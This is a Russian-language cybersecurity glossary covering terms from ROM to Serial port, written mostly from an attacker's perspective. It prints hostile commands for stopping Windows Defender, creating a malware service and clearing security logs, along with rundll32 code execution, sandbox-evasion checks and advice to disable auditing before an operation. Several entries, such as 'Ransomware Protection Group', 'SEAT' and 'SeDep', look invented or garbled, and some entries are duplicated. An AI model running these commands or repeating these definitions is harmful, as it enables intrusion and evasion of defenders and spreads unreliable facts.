ROM (Read-Only Memory) Постоянная память. Firmware хранится в ROM. Firmware persistence запись малвари в ROM.

Root (Android) Получение прав суперпользователя на Android. Root позволяет устанавливать неподписанные приложения, читать данные других приложений, отключать защиту.

Root (Linux) Администратор в Linux (UID 0). Получение root цель LPE.

Root CA Корневой удостоверяющий центр. Компрометация Root CA позволяет подписывать любые сертификаты (malware с доверенной подписью).

Rootkit Набор инструментов для сокрытия присутствия в системе: скрытие процессов, файлов, сетевых соединений, регистрационных записей. Rootkit может работать в userspace (LD_PRELOAD) или kernel (LKM).

ROP (Return-Oriented Programming) Техника эксплуатации, использующая последовательности инструкций (gadgets), заканчивающиеся return, для выполнения произвольного кода без внедрения shellcode. ROP обходит DEP (NX). Для защиты используется CFG (Control Flow Guard).

RPC (Remote Procedure Call) Протокол удаленного вызова процедур. Windows RPC используется для многих служб. Уязвимости RPC (MS08-067, EternalBlue) использовались для распространения червей.

RPG (Ransomware Protection Group) Группа защиты от ransomware. Для атакующего RPG противник.

RPO (Recovery Point Objective) Целевая точка восстановления: допустимая потеря данных в времени (RPO). Если RPO жертвы велик (бэкапы раз в сутки), атакующий может уничтожить данные, и жертва потеряет много.

RPO (Relative Path Overwrite) Техника XSS, использующая относительные пути для обхода CSP.

RSA (Rivest-Shamir-Adleman) Алгоритм асимметричного шифрования. RSA 2048+ считается безопасным. В ransomware RSA используется для шифрования ключа AES. В 2026 пост-квантовая угроза для RSA (алгоритм Шора) требует перехода на пост-квантовую криптографию.

RSA Key Ключ RSA (публичный и приватный). Кража приватного ключа RSA позволяет расшифровать данные, подписанные им.

RSA SecurID Аппаратный токен (или софт) для MFA. SecurID использует временные OTP. Атаки на SecurID: кража seed, атака на алгоритм.

RTO (Recovery Time Objective) Целевое время восстановления. Если RTO жертвы мал, она быстро восстановится и может не платить выкуп.

RTOS (Real-Time Operating System) Операционная система реального времени (VxWorks, FreeRTOS). Используется в промышленных системах, медицинских устройствах, автомобилях. Уязвимости RTOS могут привести к физическим последствиям.

RTP (Real-Time Payment) Система мгновенных платежей (FedNow, RTP). Используется в BEC: атакующие инициируют мгновенные переводы, которые сложно отменить.

RTP (Real-time Transport Protocol) Протокол передачи голоса и видео. RTP может быть перехвачен в VoIP-атаках.

RTT (Round-Trip Time) Время кругового пути. В атаках RTT используется для: timing attacks, определения геолокации сервера.

RU (Russia) Россия. ccTLD .ru используется для регистрации доменов, менее доступных для US seizure. Хостинг в РФ часто bulletproof (не реагирует на жалобы).

Rubber Ducky Bad USB устройство, эмулирующее клавиатуру. Используется для физического пентеста: подключается к компьютеру, вводит команды (открыть PowerShell, скачать малварь). Устройство распознается как клавиатура, поэтому не блокируется.

RUBY Язык программирования. Используется в Metasploit (модули на Ruby). Малварь на Ruby редко встречается.

RUF (Recovery USB Flash) USB-флешка для восстановления системы. Для атакующего RUF может быть использована для загрузки вредоносного образа.

Rug Pull Мошенничество в DeFi: создатели токена/протокола набирают ликвидность, затем выводит все средства (обычно через уязвимость или просто удаляют ликвидность). Жертвы остаются с токенами, которые ничего не стоят. Rug pull одна из основных атак в DeFi.

Run (Registry) Ключ реестра для автозапуска программ. Используется для persistence.

RunAs Утилита Windows для запуска программ от имени другого пользователя. RunAs может быть использована для повышения привилегий (если есть пароль).

Rundll32 Легитимная утилита Windows для запуска функций из DLL. Rundll32 используется в LOLBins для выполнения кода: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication "; или rundll32.exe shell32.dll,Control_RunDLL.

Rundll32.exe Легитимная утилита Windows для запуска функций из DLL. Rundll32 используется в LOLBins для выполнения кода: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication "; или rundll32.exe shell32.dll,Control_RunDLL. Rundll32 позволяет выполнять код без создания нового процесса (запускается в контексте rundll32.exe).

RUST Язык программирования, используемый для создания малвари (BlackCat, Qilin). Rust-малварь сложнее анализировать, чем C/C++, из-за отсутствия стандартных инструментов реверс-инжиниринга. Rust компилируется в нативный код, не требует runtime.

RustDesk Open-source RMM (Remote Monitoring and Management), альтернатива AnyDesk. Используется атакующими для persistence. Легитимен, поэтому не блокируется.

Rusty Сленговое: "заржавевший" (rusty) означает устаревший, необновляемый, забытый. В контексте атак rusty systems системы, которые не патчились годами (legacy), легкие цели.

RW (Read-Write) Право на чтение и запись. Для атакующего RW доступ возможность модификации.

RWE (Read-Write-Execute) Право на чтение, запись, выполнение. В защите памяти RWE-страницы подозрительны.

Rwx (Read-Write-Execute) Права доступа к страницам памяти: Read (чтение), Write (запись), Execute (выполнение). В защите памяти страницы с правами RWX считаются подозрительными (обычно код не должен быть writable). Для shellcode требуется память с правами RX (Read-Execute) или RWX.

Rx (Receive) Прием данных.

RZ (Recovery Zone) Зона восстановления (Recovery Zone) в системах бэкапов. В контексте атак может быть целью для уничтожения.

S

S3 (Simple Storage Service) Облачное хранилище Amazon Web Services. S3 бакеты используются для хранения любых данных: файлов, бэкапов, статики сайтов, логов. Основная уязвимость S3 misconfig: публичные бакеты (public-read), когда любой может прочитать содержимое. ShinyHunters ищет открытые S3 бакеты через Shodan и скачивает терабайты данных. Для атакующего кража ключей AWS (Access Key ID + Secret Access Key) дает полный доступ к S3. S3 также используется для эксфильтрации: атакующий создает свой бакет и загружает украденные данные, используя легитимный API AWS.

SaaS (Software as a Service) Модель предоставления программного обеспечения как услуги через интернет (Salesforce, Okta, ServiceNow, Microsoft 365, Google Workspace). Клиент не управляет инфраструктурой, только использует приложение. Для атакующего SaaS цель, потому что там хранятся данные сотен компаний-клиентов. Основные векторы атак на SaaS: misconfiguration (guest user over-permission), OAuth token theft, session hijacking, over-privileged integrations. ShinyHunters специализируется на атаках на Salesforce через misconfigured Experience Cloud.

SaaS Misconfiguration Ошибки конфигурации в SaaS платформах, которые приводят к утечкам данных. Примеры: guest user over-permission (гостевой пользователь имеет права на чтение/запись чувствительных объектов), публичные API, отсутствие MFA для администраторов, избыточные права у интеграций (OAuth scopes). ShinyHunters живет на SaaS misconfig: они находят Salesforce Experience Cloud сайты, где guest user может читать Contacts и Cases, и через API эксфильтруют миллионы записей.

SACL (System Access Control List) Системный ACL в Windows, определяющий, какие действия подлежат аудиту (логированию). SACL настраивается на объектах (файлы, папки, реестр, процессы) и указывает: какие попытки доступа (успешные, неудачные) записывать в журнал безопасности (Security Event Log). Для атакующего SACL важен, потому что если он не знает, какие действия логируются, он может оставить следы. Перед операцией атакующий должен определить политики аудита (через auditpol) и, если возможно, отключить аудит или действовать так, чтобы не триггерить SACL.

SAML (Security Assertion Markup Language) Стандарт на основе XML для обмена аутентификационными данными между сторонами. SAML используется для Single Sign-On (SSO): пользователь входит один раз (в Identity Provider, например, Okta, Azure AD) и получает доступ ко всем подключенным приложениям (Service Providers). SAML assertion XML-документ, который Identity Provider выдает после успешной аутентификации; он содержит информацию о пользователе (имя, атрибуты) и подписан ключом Identity Provider. Атаки на SAML: XML signature wrapping (подделка подписи), подделка assertion (если слабый ключ подписи), кража ключа подписи Identity Provider. Компрометация SAML дает атакующему доступ ко всем приложениям, использующим SSO.

SAML Assertion Утверждение SAML XML-документ, содержащий информацию об аутентифицированном пользователе: идентификатор, имя, email, атрибуты, время жизни. Утверждение подписывается приватным ключом Identity Provider. Service Provider проверяет подпись и доверяет утверждению. Для атакующего подделка SAML assertion (через кражу ключа подписи или уязвимость в проверке) позволяет войти как любой пользователь, включая администратора, без знания пароля и MFA.

SAN (Storage Area Network) Сеть хранения данных, выделенная инфраструктура для подключения серверов к системам хранения (дисковые массивы, ленточные библиотеки). SAN использует протоколы Fiber Channel, iSCSI, FCoE. В отличие от NAS (Network Attached Storage), SAN работает на уровне блоков, а не файлов. Атаки на SAN: компрометация контроллера SAN (через управляющий интерфейс, часто Ethernet), шифрование данных (ransomware на SAN), физическое уничтожение дисков, нарушение репликации. Для атакующего SAN цель, потому что там хранятся данные всей организации.

Sandbox Изолированная среда для выполнения непроверенного кода (малвари, подозрительных файлов). Sandbox используются защитниками для анализа малвари: запускают образец, наблюдают за системными вызовами, сетевыми соединениями, изменениями в файловой системе. Типы sandbox: Cape (Cuckoo Advanced Persistent Emulation), Cuckoo, FireEye AX, Joe Sandbox. Для атакующего sandbox препятствие: если малварь попадает в sandbox, ее поведение становится известным, хэши добавляются в антивирусы. Для обхода используются анти-сэндбокс техники: проверка на наличие виртуализации (VMware, VirtualBox), проверка имени пользователя (sandbox часто используют стандартные имена), проверка объема памяти (в sandbox часто мало), задержки выполнения (sandbox ограничены по времени), проверка наличия мыши/графики (в sandbox часто нет реального UI).

Sandbox Detection Обнаружение sandbox: техники, используемые малварью для определения, что она выполняется в изолированной среде, а не на реальном компьютере жертвы. Примеры: проверка имени процесса (vmtoolsd, vboxservice), проверка MAC-адреса (00:0C:29 для VMware), проверка объема оперативной памяти (<2GB), проверка наличия мыши (GetCursorPos), проверка времени работы системы (если система только что загружена), проверка количества ядер процессора (обычно в sandbox 1-2 ядра). Если малварь обнаруживает sandbox, она может: прекратить выполнение, выполнять легитимные действия (имитация), или использовать задержки, чтобы выйти за пределы времени анализа.

Sandbox Escape Побег из sandbox: использование уязвимости в sandbox-среде (Cape, Cuckoo, Docker) для выполнения кода на хост-системе. Sandbox escape позволяет малвари заразить системы исследователей безопасности, которые анализируют ее. Примеры: CVE-2020-15257 (containerd), CVE-2019-5736 (runc). Для атакующего sandbox escape способ атаковать защитников напрямую.

SANS (SysAdmin, Audit, Network, Security) Институт, проводящий обучение по кибербезопасности и сертификацию (GIAC Global Information Assurance Certification). SANS также публикует отчеты об атаках (SANS ISC), проводит конференции. Для атакующего SANS интересен как источник информации о TTPs защитников и о том, какие методы обучения используются.

SAP Немецкая компания, производитель ERP-систем (SAP ERP, SAP S/4HANA). SAP системы используются крупными корпорациями для управления финансами, логистикой, производством, HR. SAP цель для атак на корпоративные данные. Уязвимости SAP: misconfig (default credentials, открытые порты), уязвимости в модулях (например, ICM, Gateway), недостаточное разделение сред. Атаки на SAP могут привести к краже финансовых данных, изменению проводок, остановке производства.

SASL (Simple Authentication and Security Layer) Фреймворк для добавления аутентификации и шифрования в протоколы (LDAP, IMAP, SMTP). SASL поддерживает механизмы: PLAIN, LOGIN, CRAM-MD5, GSSAPI (Kerberos), DIGEST-MD5. Атаки на SASL: перехват (если не используется TLS), downgrade (принуждение к слабому механизму), подбор пароля (CRAM-MD5). Для атакующего SASL важен при атаках на почтовые и каталоговые сервисы.

SATA (Serial ATA) Интерфейс подключения накопителей (HDD, SSD) к материнской плате. В физических атаках SATA может быть использован для прямого доступа к диску: извлечение диска из работающей системы и подключение к другому компьютеру через SATA-USB адаптер для чтения данных, обхода шифрования (если диск не зашифрован или ключи в памяти). Для атакующего физический доступ через SATA способ получить данные даже с заблокированного компьютера (если диск не зашифрован BitLocker/FileVault).

SBC (Session Border Controller) Устройство, управляющее VoIP-сессиями (SIP) на границе сети. SBC обеспечивает безопасность, NAT traversal, контроль качества. Атаки на SBC: DoS (истощение ресурсов), перехват звонков (если слабая аутентификация), фрод (мошеннические звонки через SBC), эксплуатация уязвимостей в SIP-стеке.

SC (Service Control) Утилита Windows для управления службами (sc.exe). Команды: sc start, sc stop, sc create, sc delete. Используется атакующими для: остановки антивируса (sc stop WinDefend), создания вредоносной службы для persistence (sc create Malware binPath= "C:\malware.exe" start= auto), удаления служб. SC легитимная утилита, поэтому не блокируется.

SCADA (Supervisory Control and Data Acquisition) Системы диспетчерского управления и сбора данных для промышленных процессов: энергетика, водоснабжение, нефтегаз, химическая промышленность, транспорт. SCADA собирает данные с датчиков (PLC, RTU) и позволяет оператору управлять процессами (открыть клапан, запустить насос). Протоколы: Modbus, DNP3, OPC, PROFINET. Атаки на SCADA: изменение параметров (давление, температура, концентрация химикатов), отключение оборудования, DoS (перегрузка контроллеров), физическое разрушение. В атаке на водоканал в Техасе (2026) злоумышленники получили доступ к SCADA через RDP с default credentials и изменили уровень хлора.

Scalability Масштабируемость: способность системы (или атаки) обрабатывать растущую нагрузку без потери эффективности. Для атакующего scalability возможность атаковать множество целей автоматически. ShinyHunters использует автоматизированные сканеры (модифицированный Aura Inspector) для масштабирования: один сканер проверяет тысячи Salesforce сайтов, находит misconfig, эксфильтрует данные. Ботнеты пример scalability в DDoS-атаках.

Scam Мошенничество, основанное на социальной инженерии, не требующее сложных технических навыков. Типы: fake support (звонок "из Microsoft", что компьютер заражен), инвестиционные пирамиды, романтический scam, fake lottery. Scam часто не использует малварь только обман. В отличие от хакерских атак, scam не требует взлома систем.

Scan (Network) Сканирование сети: отправка пакетов к IP-адресам и портам для определения активных хостов, открытых портов, работающих сервисов, операционной системы. Инструменты: nmap, masscan, zmap. Активная разведка (active recon) может быть обнаружена системами IDS/IPS. Для скрытности атакующие используют slow scan (маленькая скорость), random scan (случайный порядок), распределенное сканирование (через ботнет), или сканирование через прокси.

Scanned (Port) Сканирование портов.

Scanner (Vulnerability) Сканер уязвимостей: программа для автоматического поиска известных уязвимостей в системах (Nessus, OpenVAS, Qualys, Nexpose). Сканер проверяет версии ПО, конфигурации, отсутствие патчей, default credentials. Для атакующего сканер инструмент для поиска целей, для защитников для аудита. Сканирование может быть обнаружено, поэтому атакующие используют его с осторожностью или после получения доступа к внутренней сети.

Scareware Вредоносное ПО, запугивающее жертву ("ваш компьютер заражен", "найдены вирусы", "срочно позвоните в поддержку") и требующее оплаты за "лечение". Scareware часто распространяется через pop-up окна в браузере. Не требует сложной эксплуатации, только психологическое давление.

Scattered LAPSUS$ Hunters Консолидированная структура The Com, объединяющая тактики трех групп: Scattered Spider (vishing, helpdesk, MFA bypass), LAPSUS$ (SaaS abuse, OAuth token theft, insider recruitment), ShinyHunters (data extortion, leak sites, public pressure). Операционная модель: vishing MFA bypass доступ к SaaS (Okta, Salesforce, Azure AD) OAuth token theft эксфильтрация данных extortion с угрозой публикации. Это объединение показывает эволюцию The Com от разрозненных групп к координированной сети.

Scattered Spider Киберпреступная группа, часть The Com (The Community). Специализируется на vishing (голосовой фишинг), атаках на helpdesk, MFA bypass. Scattered Spider известна атаками на MGM и Caesars (2023), Marks & Spencer, Co-op (2025). Тактика: звонок в IT helpdesk под видом сотрудника, просьба сбросить MFA, установка легитимных RMM-инструментов (AnyDesk, ScreenConnect) для persistence, затем кража данных и шифрование (ransomware). В 2026 Scattered Spider консолидировалась с ShinyHunters и LAPSUS$ под общим брендом Scattered LAPSUS$ Hunters.

SCCM (System Center Configuration Manager) Microsoft Endpoint Configuration Manager (ранее SCCM) система управления корпоративными компьютерами: развертывание ПО, обновлений, скриптов, инвентаризация. SCCM работает через клиентский агент на каждом ПК. Для атакующего SCCM инструмент для lateral movement, развертывания малвари, отключения защит. Компрометация учетной записи с правами администратора SCCM позволяет выполнить вредоносный скрипт на всех управляемых устройствах.

Scheduled Task Запланированная задача в Windows Task Scheduler. Используется для persistence: создание задачи, которая запускает малварь при загрузке системы, при логине пользователя, по расписанию (каждые N минут). Инструменты: schtasks (командная строка), PowerShell (Register-ScheduledTask). Scheduled tasks можно скрыть от стандартного просмотра через манипуляцию атрибутами.

Scrambling Скремблирование (обфускация) кода: преобразование инструкций в последовательности, сложные для понимания, но сохраняющие функциональность. Scrambling используется в малвари для усложнения статического анализа и обхода сигнатурных детектов. Примеры: перестановка инструкций, добавление "мусорных" инструкций (junk code), кодирование строк.

ScreenCapture Снятие скриншота (снимка экрана). Инфостилеры (RedLine, LummaC2, Stealc) делают скриншоты для кражи информации с экрана: паролей, вводимых в формы, конфиденциальных документов, переписки. Скриншоты отправляются на C2. ScreenCapture также используется в шпионаже для слежки за активностью жертвы.

ScreenConnect RMM (Remote Monitoring and Management) инструмент от ConnectWise для удаленной поддержки. ScreenConnect позволяет администратору подключаться к удаленным компьютерам, передавать файлы, запускать команды. ScreenConnect легитимный софт, поэтому не блокируется антивирусами. Атакующие используют ScreenConnect для persistence после vishing: убеждают helpdesk установить ScreenConnect, затем используют его для доступа в любое время. Interlock использовал ScreenConnect как backup entry point в своей инфраструктуре.

Scribe В контексте атак Scribe это Scribe, платформа логирования и мониторинга (Scribe Security), или Scribe инструмент для реверс-инжиниринга протоколов. В хакерском словаре чаще встречается как компонент систем логирования, который нужно обходить или чистить.

Script Скрипт (программа на интерпретируемом языке: PowerShell, Python, VBScript, JavaScript, Bash). Скрипты используются атакующими для: автоматизации, безфайлового выполнения (script выполняется в памяти), обхода политик (PowerShell ExecutionPolicy Bypass), доставки малвари. ClickFix использует PowerShell скрипт: жертва копирует и вставляет его в Win+R, скрипт выполняется.

Script Kiddie "Скрипткидди": пренебрежительное название для начинающего хакера, который использует готовые инструменты (скрипты, эксплойты) без понимания, как они работают. Script kiddie не разрабатывает собственные инструменты, не знает основ, часто совершает OPSEC ошибки. Для серьезного атакующего script kiddie не конкурент.

SCSI (Small Computer System Interface) Интерфейс для подключения устройств хранения (диски, ленточные библиотеки). SCSI используется в серверах и хранилищах данных. В физических атаках SCSI может быть использован для прямого доступа к диску через SCSI-порт (если есть физический доступ), минуя операционную систему.

SDK (Software Development Kit) Набор инструментов для разработки ПО (библиотеки, компиляторы, отладчики). В атаках SDK могут использоваться для: создания малвари (Windows SDK для компиляции), легитимизации (подпись кода через SDK), разработки кастомных инструментов.

SDL (Security Development Lifecycle) Процесс обеспечения безопасности на этапе разработки, внедренный Microsoft (Microsoft SDL). Включает: требования безопасности, анализ угроз, статический анализ кода, динамический анализ, тестирование на проникновение. Организации, следующие SDL, имеют меньше уязвимостей, потому что безопасность встроена в процесс, а не добавлена после. Для атакующего это означает, что поиск уязвимостей в таком ПО требует больше времени.

SDP (Software-Defined Perimeter) Модель безопасности, создающая виртуальный периметр вокруг каждого устройства или пользователя (zero trust). В отличие от традиционного периметра (firewall на границе сети), SDP требует аутентификации и авторизации для каждого доступа, скрывает ресурсы от несанкционированных пользователей. SDP использует контроллеры, которые динамически создают соединения между авторизованными пользователями и ресурсами. Для атакующего SDP препятствие: нет постоянного сетевого доступа, каждое соединение аутентифицируется, ресурсы не видны без авторизации. Атака на SDP требует компрометации контроллера или учетных данных.

SDR (Software-Defined Radio) Радио, настраиваемое программно. SDR позволяет передавать и принимать радиосигналы на широком диапазоне частот. Устройства: HackRF, BladeRF, USRP. В физическом пентесте SDR используется для: клонирования RFID (эмуляция карт), атак на ключи автомобилей (перехват сигнала), перехвата GSM (IMSI catcher), анализа беспроводных сетей. SDR требует глубокого понимания радиопротоколов.

SDS (Software-Defined Storage) Программно-определяемое хранилище: система хранения, управляемая программно, отделяющая управление от физического оборудования. Примеры: Ceph, VMware vSAN, Dell EMC PowerFlex. Атаки на SDS: компрометация контроллера (через API, веб-интерфейс), уничтожение данных, шифрование, нарушение репликации.

SE (Social Engineering) См. Social Engineering. Social Engineering (социальная инженерия) психологические методы для получения информации или доступа. Виды: vishing (голос), phishing (email), smishing (SMS), pretexting (вымышленный сценарий), baiting (приманка), tailgating (следование). The Com специализируется на vishing в helpdesk.

SeAssignPrimaryTokenPrivilege Привилегия Windows, позволяющая назначать первичные токены. Используется для создания процессов от имени других пользователей.

SEAT (Security Event and Audit Trail) Журнал событий безопасности и аудита. В Windows это Security Event Log. SEAT содержит записи о входах в систему, изменениях прав, запуске процессов, доступе к объектам. Для атакующего SEAT то, что нужно чистить, чтобы не оставить следов. Методы очистки: wevtutil cl Security, PowerShell Clear-EventLog, агрессивное удаление через WMI.

Seatbelt Инструмент с открытым кодом для сбора информации о системе Windows (энумерация). Seatbelt собирает: данные о пользователях, группах, установленных программах, сетевых настройках, политиках безопасности, запланированных задачах, службах. Используется в post-exploitation для понимания окружения и поиска путей для lateral movement.

SeAuditPrivilege Привилегия Windows, позволяющая генерировать записи аудита. Используется для манипуляции аудитом.

SeBackupPrivilege Привилегия Windows, позволяющая читать любые файлы, независимо от разрешений (для целей бэкапа). Используется для дампа NTDS.dit (базы AD), кражи файлов конфигурации. Для получения SYSTEM через SeBackupPrivilege используются утилиты (reg save, disk shadow).

SEC (Securities and Exchange Commission) Комиссия по ценным бумагам США. SEC требует от публичных компаний раскрывать киберинциденты в форме 8-K (material cybersecurity incidents). Conduent filed 8-K после утечки 25M+ записей. Для атакующего SEC leverage: угроза сообщить о нераскрытом инциденте может усилить давление на жертву.

SecOps Операции безопасности (Security Operations): объединение IT и безопасности для мониторинга, реагирования, управления уязвимостями. SecOps использует EDR, SIEM, SOAR. Для атакующего SecOps противник, который интегрирует защиту в IT-процессы, сокращая время реакции.

SeCreatePagefilePrivilege Привилегия Windows, позволяющая создавать файл подкачки. Используется в некоторых техниках.

SeCreateSymbolicLinkPrivilege Привилегия Windows, позволяющая создавать символические ссылки. Используется для обхода ограничений файловой системы.

SeCreateTokenPrivilege Привилегия Windows, позволяющая создавать токены. Дает полный контроль над системой. Обычно не присваивается обычным пользователям.

Secret (Kubernetes) Kubernetes secret объект в Kubernetes для хранения чувствительных данных: пароли, API-ключи, токены, SSH-ключи. Secrets хранятся в etcd (база данных кластера) и могут быть зашифрованы. Кража secrets из Kubernetes (через доступ к etcd, misconfig, уязвимости) дает атакующему доступ к приложениям, базам данных, облачным ресурсам.

Secret Management Управление секретами (паролями, ключами) с использованием специализированных систем: Hashicorp Vault, AWS Secrets Manager, Azure Key Vault, Google Cloud Secret Manager. Secret Management централизует хранение, обеспечивает ротацию, аудит доступа. Для атакующего Secret Management цель: кража всех секретов из централизованного хранилища может дать доступ ко всей инфраструктуре организации.

Secure Boot Механизм UEFI, проверяющий подпись загрузчика (bootloader) перед его выполнением. Secure Boot предотвращает загрузку неподписанного кода (bootkits, rootkits) на уровне прошивки. Для атакующего Secure Boot препятствие: нужно иметь подписанный загрузчик (через уязвимости в shim, или украденный ключ) или отключить Secure Boot (через физический доступ к BIOS/UEFI).

Secure Enclave Защищенный сопроцессор в устройствах Apple (iPhone, iPad, Mac). Secure Enclave изолирован от основного процессора, хранит ключи шифрования, биометрические данные (Touch ID, Face ID). Взлом Secure Enclave требует физического доступа и сложного оборудования (например, использование уязвимостей в SEP Secure Enclave Processor). Для атакующего Secure Enclave препятствие при извлечении ключей из Apple-устройств.

Secure Shell (SSH) Протокол для удаленного управления (порт 22) с шифрованием и аутентификацией. SSH используется для: администрирования серверов, туннелирования (port forwarding), передачи файлов (SFTP), C2 (SSH-туннели). Аутентификация может быть по паролю или по SSH-ключам. Атаки на SSH: брутфорс паролей, кража SSH-ключей (приватных), уязвимости в реализации (CVE-2024-6387), man-in-the-middle (если нет проверки ключа хоста).

Security Assertion Markup Language (SAML) Стандарт на основе XML для обмена аутентификационными данными (Security Assertion Markup Language). SAML используется для Single Sign-On (SSO). SAML assertion XML-документ, который Identity Provider выдает после успешной аутентификации; он содержит информацию о пользователе и подписан ключом Identity Provider. Атаки на SAML: XML signature wrapping (подделка подписи), подделка assertion (если слабый ключ подписи), кража ключа подписи Identity Provider.

Security Information and Event Management (SIEM) Система сбора, корреляции и анализа логов (Security Information and Event Management) Splunk, QRadar, Microsoft Sentinel. SIEM собирает события с различных источников (Windows Event Log, syslog, firewall, EDR, IDS) и коррелирует их для обнаружения атак. Для атакующего SIEM угроза: нужно не создавать событий, которые будут коррелироваться, или чистить логи до агрегации.

Security Operations Center (SOC) Центр мониторинга и реагирования на инциденты (Security Operations Center). SOC подразделение организации или аутсорсинговый сервис (MSSP), которое: круглосуточно мониторит события безопасности (через EDR, SIEM, NDR), анализирует алерты, проводит расследование инцидентов, координирует реагирование, занимается threat hunting (проактивный поиск угроз). SOC главный противник атакующего. SOC использует playbooks (сценарии реагирования), SOAR (Security Orchestration, Automation, and Response) для автоматизации, threat intelligence для обновления детектов. Для атакующего успешная атака это атака, которую SOC не заметил или заметил слишком поздно.

Security Token Токен безопасности, используемый для аутентификации и авторизации: OAuth access token, SAML assertion, JWT, Kerberos ticket. Кража security token позволяет атакующему получить доступ к системам без пароля и MFA. Токены могут быть украдены через инфостилеры, перехват трафика (MITM), XSS.

SeDebugPrivilege Привилегия Windows, позволяющая отлаживать процессы (открывать процесс с правами PROCESS_ALL_ACCESS). SeDebugPrivilege используется для дампа LSASS (извлечение паролей), инъекции кода в процессы. Администраторы имеют эту привилегию по умолчанию. EDR могут мониторить использование SeDebugPrivilege для детекции Mimikatz.

SeDep (Security Descriptor) Дескриптор безопасности Windows (Security Descriptor), определяющий права доступа к объекту (файлу, процессу, ключу реестра). Содержит DACL (Discretionary Access Control List) и SACL (System Access Control List). Атакующий может изменять дескрипторы для получения доступа: снять защиту с объекта (SetSecurityInfo), добавить себе права.

SEH (Structured Exception Handling) Обработка исключений в Windows. SEH используется в эксплойтах (SEH overwrite): перезапись адреса обработчика исключения для получения контроля потока. Защита: SEHOP (Structured Exception Handling Overwrite Protection) проверяет цепочку обработчиков.

SEHOP (Structured Exception Handling Overwrite Protection) Защита от перезаписи SEH. SEHOP проверяет цепочку обработчиков исключений, не позволяет перезаписать SEH.

SeImpersonatePrivilege Привилегия Windows, позволяющая олицетворять (impersonate) другого пользователя после аутентификации. Используется для повышения привилегий (LPE) через RottenPotatoNG, JuicyPotato: атакующий создает службу, которая аутентифицируется, и использует impersonate для получения SYSTEM.

SeIncreaseBasePriorityPrivilege Привилегия Windows, позволяющая увеличивать приоритет процессов. Используется для повышения производительности малвари или для DoS.

SeIncreaseQuotaPrivilege Привилегия Windows, позволяющая увеличивать квоты процессов. Используется в некоторых техниках повышения привилегий.

Self-Signed Certificate Самоподписанный сертификат: сертификат X.509, подписанный своим же приватным ключом, а не удостоверяющим центром (CA). Используется в C2 для шифрования трафика без привлечения CA. Самоподписанные сертификаты вызывают предупреждение в браузере, но могут быть использованы для C2, где клиент агент, а не браузер. Могут быть заблокированы, если организация не доверяет самоподписанным сертификатам.

SELinux (Security-Enhanced Linux) Мандатный контроль доступа (MAC) в Linux, реализованный в ядре. SELinux ограничивает действия процессов даже с root-правами, основываясь на политиках (типы, роли). SELinux может предотвратить выполнение многих атак после получения root. Для атакующего SELinux препятствие: нужно понимать политики, находить уязвимости для обхода (например, переход в домен unconfined_t), или отключать SELinux (через misconfig, физический доступ). SELinux часто отключается администраторами из-за сложности настройки.

SeLoadDriverPrivilege Привилегия Windows, позволяющая загружать драйверы. Используется для BYOVD (Bring Your Own Vulnerable Driver): загрузка уязвимого драйвера для отключения EDR или получения kernel access.

SeLockMemoryPrivilege Привилегия Windows, позволяющая блокировать страницы памяти, предотвращая их выгрузку на диск. Используется для защиты ключей шифрования от выгрузки.

SeManageVolumePrivilege Привилегия Windows, позволяющая управлять томами (форматирование, монтирование). Используется для уничтожения данных (wiper) или для доступа к файловой системе в обход разрешений.

Semaphore Семафор объект синхронизации в операционных системах, используемый для управления доступом к ресурсам в многопоточных приложениях. В контексте атак semaphore может быть использован в: эксплойтах race condition (TOCTOU), малвари для синхронизации потоков. Для атакующего понимание semaphore важно при написании сложных многопоточных эксплойтов.

Sendmail MTA (Mail Transfer Agent) в Unix-системах. Sendmail был стандартом в 1990-х, но имел множество уязвимостей (buffer overflow, command injection). В 2026 Sendmail считается устаревшим, заменен Postfix, Exim. Может встречаться в legacy-системах.

Sensitive Data Чувствительные данные: PII (персональные данные), PHI (медицинские данные), финансовые данные, коммерческая тайна, пароли, ключи. Цель атак. Утечка sensitive data основа extortion.

Sensitivity (Data) Уровень чувствительности данных (конфиденциальность). Данные могут классифицироваться как public, internal, confidential, secret. Для атакующего данные с высокой чувствительностью имеют большую ценность для extortion.

Sensor (OT) Датчик в промышленных системах (температура, давление, уровень). Датчики подключаются к PLC (Programmable Logic Controller). Компрометация датчика (через подмену данных) может привести к ложным показаниям, что в свою очередь может вызвать аварийную ситуацию (оператор принимает неверное решение).

Sentinel (Microsoft Sentinel) SIEM (Security Information and Event Management) от Microsoft, работающий на Azure. Sentinel собирает логи из M365 (Office 365), Azure, on-prem (через агентов), а также из сторонних источников. Использует AI для обнаружения угроз, автоматизации реагирования (playbooks). Для атакующего Sentinel угроза: нужно не создавать событий, которые будут коррелироваться, или чистить логи до агрегации. Sentinel интегрирован с Defender для Endpoint, что дает комплексную картину.

SentinelOne Вендор EDR (Endpoint Detection and Response) с продуктом Singularity. SentinelOne использует поведенческий анализ, AI, изолированную среду (containerization). Для атакующего SentinelOne серьезный противник, требующий тщательной evasion (direct syscalls, memory-only payloads, отключение через BYOVD). SentinelOne также имеет функции автономной защиты (даже без сети).

Separation (Network) Сетевая сегментация: разделение сети на изолированные сегменты (VLAN, firewall policies) для ограничения lateral movement. Для атакующего сегментация препятствие: нужно найти пути между сегментами (jump boxes, dual-homed хосты, VPN). Handala атаковала через Intune, который имел доступ ко всем сегментам, обходя сегментацию.

SeProfileSingleProcessPrivilege Привилегия Windows, позволяющая профилировать процессы. Используется в инструментах мониторинга.

Sequel (SQL) SQL (Structured Query Language) язык структурированных запросов для работы с реляционными базами данных. SQL используется для: извлечения данных (SELECT), вставки (INSERT), обновления (UPDATE), удаления (DELETE), создания и изменения структуры базы (CREATE, ALTER). В контексте атак SQL инструмент для SQL injection (SQLi): внедрение SQL-кода в параметры запроса для кражи данных, модификации, выполнения команд (через xp_cmdshell в MSSQL). Sequel альтернативное произношение SQL (как "сиквел").

Sequence (SQL) Последовательность (sequence) в SQL объект для генерации уникальных чисел (автоинкремент). В атаках sequence может быть использован для IDOR (Insecure Direct Object Reference): зная паттерн генерации ID, атакующий может перебирать значения.

SeRelabelPrivilege Привилегия Windows, позволяющая изменять мандатные метки (обязательный контроль доступа). Используется в системах с мандатным доступом.

SeRestorePrivilege Привилегия Windows, позволяющая записывать в любые файлы, независимо от разрешений. Используется для модификации системных файлов, установки малвари, замены легитимных бинарников.

Serial (Port) Последовательный порт (RS-232, RS-485). Используется в промышленных системах для подключения PLC, датчиков, HMI. Атаки на serial порты: перехват данных (если нет шифрования), отправка команд (если есть доступ), физическое подключение к порту для получения shell (на embedded-системах).

